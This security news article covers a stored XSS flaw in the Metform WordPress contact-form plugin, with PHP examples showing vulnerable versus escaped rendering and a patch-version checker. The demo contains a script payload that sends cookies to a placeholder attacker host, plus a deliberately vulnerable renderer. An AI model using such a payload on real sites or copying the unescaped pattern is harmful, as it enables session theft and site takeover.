The United States National Vulnerability Database has published a record of a cross-site scripting (XSS) vulnerability in the widely used Metform Elementor Contact Form Builder plugin for WordPress. The plugin has over 200,000 active installations, and every site still running an unpatched version is exposed.
Stored Cross Site Scripting (XSS)
A stored XSS vulnerability occurs when a website fails to adequately sanitize an input, such as a contact form field, and later renders the submitted content without escaping it. An attacker can then submit a malicious script that is saved on the server alongside legitimate data.
When another user later loads the page that displays that data, for example an administrator reviewing form submissions, the browser executes the script in the context of the site and of that user's session. The script can read data the browser holds for the site and perform actions with the victim's privileges; against an administrator that can mean a complete website takeover.
The Open Worldwide Application Security Project (OWASP) defines Cross Site Scripting as follows:
"An attacker can use XSS to send a malicious script to an unsuspecting user.
The end user’s browser has no way to know that the script should not be trusted, and will execute the script.
Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site."
There are various kinds of XSS attacks. The vulnerability affecting the Metform contact form plugin is a stored XSS because the malicious script is saved on the website's server, in the form's submission records, rather than merely reflected back in a single response.
What makes this vulnerability particularly concerning is that it can be exploited without authentication: anyone able to submit the public contact form can plant the payload, and no account or website permission is needed.
The vulnerability has been assigned a CVSS base score of 7.2 (High) on the CVSS scale of 0 to 10, with 10 being the most severe.
Cause of the Vulnerability
The vulnerability was caused by two related coding issues. First, the plugin did not adequately check and clean the values submitted through the form's text areas before storing them, a step known as input sanitization.
Second, it did not encode those stored values when rendering them back into HTML, a step known as escaping output. Escaping on output is what actually stops the browser from treating injected markup as code; sanitizing on input is a defense-in-depth layer, because a stored value may later be rendered in a place the sanitizer did not anticipate.
In the context of escaping data, WordPress explains:
"Escaping output is the process of securing output data by stripping out unwanted data, like malformed HTML or script tags. This process helps secure your data prior to rendering it for the end user."
The combination of these two failures, unsanitized input and unescaped output, is what allowed an injected script to both persist on the server and execute in visitors' browsers.
The National Vulnerability Database warning details the issue:
"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via text areas on forms in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping.
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, such as the submissions page."
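The pattern the advisory describes, a text area whose content is stored and later shown on the submissions page, is easiest to see in code. The following is an added example written for this article, not code from Metform or from WordPress: it stores one constructed submission the vulnerable way and the hardened way, then renders both. The function names, the in-memory "database" arrays and the hypothetical exfiltration host `attacker.invalid` are illustration only; `sanitize_textarea_field()` and `esc_html()` are real WordPress functions, and the stand-ins defined here are used only when the script is run outside WordPress so that it is self-contained.

```php
<?php
// Added example, not Metform's or WordPress's code: a textarea field stored and
// later shown on an admin "submissions" page, first the vulnerable way, then
// with the two defenses the advisory names. Run standalone with
// `php stored_xss_demo.php`; inside WordPress the real sanitize_textarea_field()
// and esc_html() are used and the stand-ins below are skipped.

if (!function_exists('sanitize_textarea_field')) {
    // Approximation of WordPress sanitize_textarea_field(): drop NUL bytes,
    // strip tags, keep newlines, trim. The real function does a little more.
    function sanitize_textarea_field($str): string
    {
        $str = str_replace("\0", '', (string) $str);
        return trim(strip_tags($str));
    }
}

if (!function_exists('esc_html')) {
    // Approximation of WordPress esc_html(): entity-encode for an HTML text node.
    function esc_html($text): string
    {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Constructed submission, as any unauthenticated visitor could send it through
// the public form. The payload tries to exfiltrate cookies to a placeholder host.
const ATTACKER_SUBMISSION = [
    'name'    => 'Alice',
    'message' => "Hello,\n<script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>",
];

/** Vulnerable handler: stores the raw POST values untouched. */
function store_submission_unsafe(array &$db, array $post): void
{
    $db[] = ['name' => $post['name'] ?? '', 'message' => $post['message'] ?? ''];
}

/** Vulnerable renderer: interpolates stored values straight into HTML. */
function render_submissions_unsafe(array $db): string
{
    $html = "<table>\n";
    foreach ($db as $row) {
        // Whoever opens this page (typically an administrator) gets the stored
        // <script> parsed and executed by their browser, with their session.
        $html .= "<tr><td>{$row['name']}</td><td>{$row['message']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

/** Hardened handler: sanitize on input so tags never reach the database. */
function store_submission_safe(array &$db, array $post): void
{
    $db[] = [
        'name'    => sanitize_textarea_field($post['name'] ?? ''),
        'message' => sanitize_textarea_field($post['message'] ?? ''),
    ];
}

/**
 * Hardened renderer: escape on output for the context the value lands in.
 * esc_html() is right for a text node; an attribute needs esc_attr() and a URL
 * esc_url(). Escape first, then add the <br> markup, never the other way round.
 */
function render_submissions_safe(array $db): string
{
    $html = "<table>\n";
    foreach ($db as $row) {
        $html .= '<tr><td>' . esc_html($row['name']) . '</td><td>'
               . nl2br(esc_html($row['message'])) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Same submission through both paths.
$unsafeDb = [];
store_submission_unsafe($unsafeDb, ATTACKER_SUBMISSION);
echo "--- vulnerable: the <script> tag survives intact ---\n";
echo render_submissions_unsafe($unsafeDb);

$safeDb = [];
store_submission_safe($safeDb, ATTACKER_SUBMISSION);
echo "--- hardened: tags stripped on input, remainder entity-encoded on output ---\n";
echo render_submissions_safe($safeDb);

// Output escaping alone neutralises even a row that was stored unsanitized,
// which is why it is the layer that must never be skipped.
echo "--- escaping alone, applied to the raw stored row ---\n";
echo render_submissions_safe($unsafeDb);
```

The third rendering is the point of the exercise: the row that went in without any sanitization is still harmless once `esc_html()` encodes it, whereas the vulnerable renderer hands the browser a live `<script>` element no matter how the data arrived. In a real plugin the stand-in functions must not be shipped; they exist here only so the file runs without WordPress loaded.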
Metform Elementor Plugin is Patched
The publishers of the Metform Elementor Contact Form Builder have released patches over several versions to fix the vulnerability.
Updated Versions and Fixes:
- Version 3.2.0
  - Improved: Security and sanitization
- Version 3.2.2
  - Fixed: Security permission issue for REST API endpoint
- Version 3.2.3 (patched on 03-06-2023)
  - Fixed: Escaping issue in the signature field.
  - Fixed: Form submission for not logged in users condition.
WordPress users of the Metform Elementor Contact Form Builder are advised to update their plugin to version 3.2.3 or later; the earlier 3.2.x releases contain only part of the fix. Because the attack stores its payload in submission records, any submissions received while a vulnerable version was installed should be treated as untrusted.
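A site owner's first question is whether the installed copy is still below the fully patched release. The following is an added example, not Metform's or WordPress's code, that reads the plugin's `Version:` header and compares it against 3.2.3 with PHP's `version_compare()`. It assumes the plugin's main file is `wp-content/plugins/metform/metform.php` under the WordPress root (the wordpress.org slug is `metform`; the main-file name is an assumption), and the sample header block embedded below is constructed for the demonstration.

```php
<?php
// Added example, not Metform's or WordPress's code: decide whether an installed
// copy of the plugin still needs the update the article recommends.
// Assumptions: main plugin file at wp-content/plugins/metform/metform.php
// (file name assumed), and 3.2.3 is the first fully patched release.

const METFORM_FIXED_VERSION = '3.2.3';

/** Pull the "Version:" value out of a WordPress plugin header block. */
function plugin_header_version(string $header): ?string
{
    // WordPress reads headers as "Version: x.y.z" lines inside the file's
    // leading comment; allow the usual " * " comment prefix, case-insensitive.
    if (preg_match('/^[ \t\/*#@]*Version:\s*(\S+)/mi', $header, $m)) {
        return trim($m[1]);
    }
    return null;
}

/** True when $installed is older than the fully patched release. */
function metform_needs_update(string $installed, string $fixed = METFORM_FIXED_VERSION): bool
{
    // version_compare() handles multi-part versions and suffixes such as
    // "3.2.3-beta1" (ordered before 3.2.3), which plain string comparison gets wrong.
    return version_compare($installed, $fixed, '<');
}

/** Read the header of a live install; returns [version, needsUpdate] or null. */
function check_installed_metform(string $wpRoot): ?array
{
    $main = rtrim($wpRoot, '/') . '/wp-content/plugins/metform/metform.php';
    if (!is_readable($main)) {
        return null; // not installed, or not at the assumed path
    }
    // WordPress itself inspects only the first 8 KiB of a file for headers.
    $header  = file_get_contents($main, false, null, 0, 8192);
    $version = plugin_header_version($header);
    return $version === null ? null : [$version, metform_needs_update($version)];
}

// Constructed header block standing in for the top of a vulnerable install.
$sampleHeader = <<<'PHPHDR'
<?php
/**
 * Plugin Name: Metform Elementor Contact Form Builder
 * Version: 3.1.2
 */
PHPHDR;

$v = plugin_header_version($sampleHeader);
printf("sample header: installed %s, needs update: %s\n", $v, metform_needs_update($v) ? 'yes' : 'no');

foreach (['3.1.2', '3.2.0', '3.2.2', '3.2.3', '3.2.4'] as $candidate) {
    printf("%-6s %s\n", $candidate, metform_needs_update($candidate) ? 'update required' : 'patched');
}

// Optional live check: php metform_check.php /var/www/html
if ($argc > 1) {
    $result = check_installed_metform($argv[1]);
    echo $result === null
        ? "metform not found under {$argv[1]}\n"
        : sprintf("live install: %s, needs update: %s\n", $result[0], $result[1] ? 'yes' : 'no');
}
```

Versions 3.2.0 and 3.2.2 are reported as "update required" on purpose: they carry only part of the fix, so the threshold is the release the article identifies as fully resolving the issue, not the first release after 3.1.2. On a host with WP-CLI available, `wp plugin get metform --field=version` gives the same answer without parsing files (WP-CLI usage assumed to be installed; the plugin slug is the wordpress.org one).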